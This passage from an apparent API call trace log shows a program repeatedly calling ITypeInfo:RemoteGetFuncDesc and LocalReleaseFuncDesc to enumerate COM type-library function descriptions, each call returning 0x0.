ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x59, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5a, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5b, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5c, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5d, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5e, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5f, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x60, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x61, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x62, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x63, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x64, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x65, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x66, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x67, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x68, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x69, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6a, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.276] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.276] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6b, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6c, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6d, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6e, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6f, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x70, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x71, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x72, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x73, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x74, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x75, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x76, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x77, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x78, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x79, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7a, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7b, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7c, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7d, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.277] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.277] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7e, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7f, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x80, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x81, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x82, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x83, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x84, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x85, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x86, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x87, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x88, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x89, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8a, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8b, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8c, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8d, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8e, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8f, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x90, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.278] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.278] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x91, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x92, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x93, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x94, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x95, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x96, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x97, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x98, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x99, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9a, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9b, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9c, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9d, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9e, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9f, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa0, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa1, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa2, ppFuncDesc=0x2068f8, pDummy=0x140 | out: ppFuncDesc=0x2068f8, pDummy=0x140) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.279] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa3, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.279] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa4, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa5, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa6, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa7, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa8, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa9, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xaa, ppFuncDesc=0x2068f8, pDummy=0x140 | out: ppFuncDesc=0x2068f8, pDummy=0x140) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xab, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xac, ppFuncDesc=0x2068f8, pDummy=0x140 | out: ppFuncDesc=0x2068f8, pDummy=0x140) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xad, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xae, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xaf, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb0, ppFuncDesc=0x2068f8, pDummy=0x140 | out: ppFuncDesc=0x2068f8, pDummy=0x140) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb1, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb2, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb3, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb4, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb5, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb6, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.280] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.280] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb7, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb8, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb9, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xba, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 